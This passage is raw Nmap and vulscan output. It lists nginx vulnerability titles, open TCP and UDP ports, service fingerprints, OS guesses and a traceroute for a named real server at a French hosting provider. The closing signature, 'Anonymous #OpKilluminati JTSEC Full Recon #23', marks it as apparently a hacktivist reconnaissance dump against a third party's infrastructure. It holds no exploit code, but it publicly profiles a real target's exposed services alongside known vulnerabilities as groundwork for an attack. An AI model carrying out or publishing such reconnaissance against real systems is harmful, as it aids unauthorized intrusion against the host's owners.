8318| [100659] nginx Directory Traversal Vulnerability
8319| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
8320| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
8321| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
8322| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
8323| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
8324| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
8325| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
8326| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
8327| [71297] FreeBSD Ports: nginx
8328| [71276] FreeBSD Ports: nginx
8329| [71239] Debian Security Advisory DSA 2434-1 (nginx)
8330| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
8331| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
8332| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
8333| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
8334| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
8335| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
8336| [64894] FreeBSD Ports: nginx
8337| [64869] Debian Security Advisory DSA 1884-1 (nginx)
8338|
8339| SecurityTracker - https://www.securitytracker.com:
8340| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
8341| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
8342| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
8343| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
8344|
8345| OSVDB - http://www.osvdb.org:
8346| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
8347| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
8348| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
8349| [92796] nginx ngx_http_close_connection Function Crafted r->
8350| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
8351| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
8352| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
8353| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
8354| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
8355| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
8356| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
8357| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
8358| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
8359| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
8360| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
8361| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
8362| [62617] nginx Internal DNS Cache Poisoning Weakness
8363| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
8364| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
8365| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
8366| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
8367| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
8368| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
8369| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
8370| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
8371| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
8372| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
8373|_
8374465/tcp open ssl/smtps?
8375993/tcp open ssl/imaps?
8376995/tcp open ssl/pop3s?
83774900/tcp open hfcs?
83784999/tcp open hfcs-manager?
8379| fingerprint-strings:
8380| DNSStatusRequestTCP, DNSVersionBindReqTCP, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, WMSRequest, X11Probe, oracle-tns:
8381| HELLO FROM SERVEUR SETUP 22.0.6.0
8382| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, SIPOptions, TerminalServerCookie:
8383| ERROR 8
8384| HELLO FROM SERVEUR SETUP 22.0.6.0
8385| Help, RTSPRequest:
8386| HELLO FROM SERVEUR SETUP 22.0.6.0
8387|_ ERROR 8
83888443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
8389|_http-server-header: sw-cp-server
8390| vulscan: VulDB - https://vuldb.com:
8391| No findings
8392|
8393| MITRE CVE - https://cve.mitre.org:
8394| No findings
8395|
8396| SecurityFocus - https://www.securityfocus.com/bid/:
8397| No findings
8398|
8399| IBM X-Force - https://exchange.xforce.ibmcloud.com:
8400| No findings
8401|
8402| Exploit-DB - https://www.exploit-db.com:
8403| No findings
8404|
8405| OpenVAS (Nessus) - http://www.openvas.org:
8406| No findings
8407|
8408| SecurityTracker - https://www.securitytracker.com:
8409| No findings
8410|
8411| OSVDB - http://www.osvdb.org:
8412| No findings
8413|_
84148880/tcp open http sw-cp-server httpd (Plesk Onyx 17.8.11)
8415|_http-server-header: sw-cp-server
8416| vulscan: VulDB - https://vuldb.com:
8417| No findings
8418|
8419| MITRE CVE - https://cve.mitre.org:
8420| No findings
8421|
8422| SecurityFocus - https://www.securityfocus.com/bid/:
8423| No findings
8424|
8425| IBM X-Force - https://exchange.xforce.ibmcloud.com:
8426| No findings
8427|
8428| Exploit-DB - https://www.exploit-db.com:
8429| No findings
8430|
8431| OpenVAS (Nessus) - http://www.openvas.org:
8432| No findings
8433|
8434| SecurityTracker - https://www.securitytracker.com:
8435| No findings
8436|
8437| OSVDB - http://www.osvdb.org:
8438| No findings
8439|_
84402 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
8441==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
8442SF-Port53-TCP:V=7.80%I=7%D=11/25%Time=5DDC00B2%P=x86_64-pc-linux-gnu%r(DNS
8443SF:VersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\
8444SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c
8445SF:\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
8446==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
8447SF-Port4999-TCP:V=7.80%I=7%D=11/25%Time=5DDC00AD%P=x86_64-pc-linux-gnu%r(N
8448SF:ULL,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(RPCChe
8449SF:ck,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(Generic
8450SF:Lines,2C,"ERROR\t8\r\nHELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\
8451SF:r\n")%r(GetRequest,2C,"ERROR\t8\r\nHELLO\x20FROM\x20SERVEUR\x20SETUP\x2
8452SF:022\.0\.6\.0\r\n")%r(HTTPOptions,2C,"ERROR\t8\r\nHELLO\x20FROM\x20SERVE
8453SF:UR\x20SETUP\x2022\.0\.6\.0\r\n")%r(RTSPRequest,2C,"HELLO\x20FROM\x20SER
8454SF:VEUR\x20SETUP\x2022\.0\.6\.0\r\nERROR\t8\r\n")%r(DNSVersionBindReqTCP,2
8455SF:3,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(DNSStatusRe
8456SF:questTCP,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(H
8457SF:elp,2C,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\nERROR\t8\r\
8458SF:n")%r(SSLSessionReq,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.
8459SF:0\r\n")%r(TerminalServerCookie,2C,"ERROR\t8\r\nHELLO\x20FROM\x20SERVEUR
8460SF:\x20SETUP\x2022\.0\.6\.0\r\n")%r(TLSSessionReq,23,"HELLO\x20FROM\x20SER
8461SF:VEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(Kerberos,23,"HELLO\x20FROM\x20SERV
8462SF:EUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(SMBProgNeg,23,"HELLO\x20FROM\x20SER
8463SF:VEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(X11Probe,23,"HELLO\x20FROM\x20SERV
8464SF:EUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(FourOhFourRequest,2C,"ERROR\t8\r\nH
8465SF:ELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(LPDString,23,"H
8466SF:ELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(LDAPSearchReq,2
8467SF:3,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(LDAPBindReq
8468SF:,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r(SIPOption
8469SF:s,2C,"ERROR\t8\r\nHELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n"
8470SF:)%r(LANDesk-RC,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n
8471SF:")%r(TerminalServer,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.
8472SF:0\r\n")%r(NCP,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n"
8473SF:)%r(NotesRPC,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")
8474SF:%r(JavaRMI,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%r
8475SF:(WMSRequest,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n")%
8476SF:r(oracle-tns,23,"HELLO\x20FROM\x20SERVEUR\x20SETUP\x2022\.0\.6\.0\r\n");
8477Device type: general purpose
8478Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (91%)
8479OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4
8480Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (91%), Linux 3.10 - 3.12 (86%), Linux 4.4 (86%), Linux 3.10 (86%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 4.11 (85%), Linux 4.0 (85%), Linux 4.9 (85%)
8481No exact OS matches for host (test conditions non-ideal).
8482Uptime guess: 13.994 days (since Mon Nov 11 11:38:16 2019)
8483Network Distance: 14 hops
8484TCP Sequence Prediction: Difficulty=261 (Good luck!)
8485IP ID Sequence Generation: All zeros
8486Service Info: Host: localhost.localdomain
8487
8488TRACEROUTE (using port 587/tcp)
8489HOP RTT ADDRESS
84901 127.94 ms 10.245.200.1
84912 ...
84923 128.60 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
84934 128.56 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
84945 133.95 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
84956 156.58 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
84967 157.79 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
84978 157.59 ms be2440.agr21.ams03.atlas.cogentco.com (130.117.50.6)
84989 157.20 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
849910 167.17 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
850011 173.16 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
850112 180.31 ms 62.100.128.107
850213 181.07 ms 62.100.128.115
850314 180.58 ms vps2330-cloud.sd-france.net (92.39.247.11)
8504
8505NSE: Script Post-scanning.
8506Initiating NSE at 11:29
8507Completed NSE at 11:29, 0.00s elapsed
8508Initiating NSE at 11:29
8509Completed NSE at 11:29, 0.00s elapsed
8510#######################################################################################################################################
8511Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:29 EST
8512NSE: Loaded 47 scripts for scanning.
8513NSE: Script Pre-scanning.
8514Initiating NSE at 11:29
8515Completed NSE at 11:29, 0.00s elapsed
8516Initiating NSE at 11:29
8517Completed NSE at 11:29, 0.00s elapsed
8518Initiating Parallel DNS resolution of 1 host. at 11:29
8519Completed Parallel DNS resolution of 1 host. at 11:29, 0.03s elapsed
8520Initiating UDP Scan at 11:29
8521Scanning vps2330-cloud.sd-france.net (92.39.247.11) [15 ports]
8522Discovered open port 53/udp on 92.39.247.11
8523Completed UDP Scan at 11:29, 2.15s elapsed (15 total ports)
8524Initiating Service scan at 11:29
8525Scanning 13 services on vps2330-cloud.sd-france.net (92.39.247.11)
8526Service scan Timing: About 15.38% done; ETC: 11:40 (0:08:59 remaining)
8527Completed Service scan at 11:31, 102.59s elapsed (13 services on 1 host)
8528Initiating OS detection (try #1) against vps2330-cloud.sd-france.net (92.39.247.11)
8529Retrying OS detection (try #2) against vps2330-cloud.sd-france.net (92.39.247.11)
8530Initiating Traceroute at 11:31
8531Completed Traceroute at 11:31, 7.15s elapsed
8532Initiating Parallel DNS resolution of 1 host. at 11:31
8533Completed Parallel DNS resolution of 1 host. at 11:31, 0.00s elapsed
8534NSE: Script scanning 92.39.247.11.
8535Initiating NSE at 11:31
8536Completed NSE at 11:31, 7.13s elapsed
8537Initiating NSE at 11:31
8538Completed NSE at 11:31, 1.01s elapsed
8539Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
8540Host is up (0.15s latency).
8541
8542PORT STATE SERVICE VERSION
854353/udp open domain (unknown banner: none)
8544| fingerprint-strings:
8545| DNSVersionBindReq:
8546| version
8547| bind
8548| none
8549| NBTStat:
8550|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
855167/udp open|filtered dhcps
855268/udp open|filtered dhcpc
855369/udp open|filtered tftp
855488/udp open|filtered kerberos-sec
8555123/udp open|filtered ntp
8556137/udp filtered netbios-ns
8557138/udp filtered netbios-dgm
8558139/udp open|filtered netbios-ssn
8559161/udp open|filtered snmp
8560162/udp open|filtered snmptrap
8561389/udp open|filtered ldap
8562500/udp open|filtered isakmp
8563|_ike-version: ERROR: Script execution failed (use -d to debug)
8564520/udp open|filtered route
85652049/udp open|filtered nfs
85661 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
8567SF-Port53-UDP:V=7.80%I=7%D=11/25%Time=5DDC0173%P=x86_64-pc-linux-gnu%r(DNS
8568SF:VersionBindReq,3D,"\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bin
8569SF:d\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0\x02
8570SF:\0\x03\0\0\0\0\0\x02\xc0\x0c")%r(DNSStatusRequest,C,"\0\0\x90\x04\0\0\0
8571SF:\0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x15\0\x01\0\0\0\0\0\0\x20CKAAAA
8572SF:AAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
8573Too many fingerprints match this host to give specific OS details
8574
8575TRACEROUTE (using port 137/udp)
8576HOP RTT ADDRESS
85771 127.84 ms 10.245.200.1
85782 ... 3
85794 128.26 ms 10.245.200.1
85805 130.38 ms 10.245.200.1
85816 130.36 ms 10.245.200.1
85827 130.35 ms 10.245.200.1
85838 130.33 ms 10.245.200.1
85849 130.32 ms 10.245.200.1
858510 130.30 ms 10.245.200.1
858611 ... 18
858719 129.96 ms 10.245.200.1
858820 129.40 ms 10.245.200.1
858921 ... 28
859029 131.34 ms 10.245.200.1
859130 129.37 ms 10.245.200.1
8592
8593NSE: Script Post-scanning.
8594Initiating NSE at 11:31
8595Completed NSE at 11:31, 0.00s elapsed
8596Initiating NSE at 11:31
8597Completed NSE at 11:31, 0.00s elapsed
8598#######################################################################################################################################
8599 Anonymous #OpKilluminati JTSEC Full Recon #23